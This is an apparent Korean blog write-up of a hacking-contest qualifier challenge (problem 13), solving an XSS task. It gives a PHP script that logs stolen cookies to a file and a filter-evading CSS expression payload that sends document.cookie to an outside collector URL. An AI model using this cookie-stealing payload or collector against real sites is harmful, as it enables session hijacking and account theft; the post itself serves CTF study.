사용자 삽입 이미지

○ 예선전 13번 문제


■ 예선전 13번 문제 화면

사용자 삽입 이미지


■ Write 페이지로 이동된 화면

문제 소스 :

사용자 삽입 이미지


■ 문제 풀이 화면


해당 문제는 힌트에서도 나왔지만 XSS 관련 문제로 타사용자의 세션을 획득하라는 의미로 파악된다. 먼저 쿠키를 수집하기 위한 사이트를 만들어야 해당 페이지에서는 script 입력을 차단하기 위해서 몇몇 단어를 필터링 하고 있어서 해당 필터링 또한 위해를 해야한다.

쿠키 저장 로직 cookie.php

<?
      $fp=fopen("cookie.txt", "a++");
      fputs($fp, "cookie : $cook\n");
      fclose($fp);
?>


필터링 우회 코드

<div style="width:expression(eval('locat'+'ion').href('http://url/cookie.php?cook='+document.cookie));">


획득된 쿠키
사용자 삽입 이미지

→ 쿠키를 설정하면 메인 페이지에서 패스워드 나타남 
사용자 삽입 이미지
사용자 삽입 이미지
Posted by n3015m
:
BLOG main image
웹 해킹 스터디를 위한 공간입니다. n3oism@gmail.com by n3015m

공지사항

카테고리

분류 전체보기 (17)
공지사항 (0)
웹 해킹 & 입문 (5)
웹 해킹 & 참고자료 (2)
해킹대회 문제풀이 (8)

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

Total :
Today : Yesterday :